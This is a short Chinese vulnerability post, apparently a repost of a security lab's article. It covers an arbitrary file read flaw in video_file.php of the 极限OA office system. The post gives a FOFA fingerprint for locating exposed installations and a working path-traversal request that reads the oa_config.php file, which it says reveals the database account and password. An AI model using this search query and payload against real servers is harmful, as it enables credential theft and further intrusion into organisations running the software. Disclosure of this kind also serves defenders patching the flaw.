极限OA video_file.php 任意文件读取漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 极限OA video_file.php 任意文件读取漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

极限OA网络智能办公系统代表先进的协同管理理念,采用领先的B/S方式,实现全球化远程办公和移动办公,是中国用户群最广泛的OA软件平台,企事业网络办公,远程办公,电子政务的首选。极限OA video_file.php处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。

图片[1]-极限OA video_file.php 任意文件读取漏洞-安全小天地

0x03 漏洞复现

fofa:icon_hash=”1967132225″

1.执行POC得到路径,数据库账户密码等信息


/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
图片[2]-极限OA video_file.php 任意文件读取漏洞-安全小天地

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容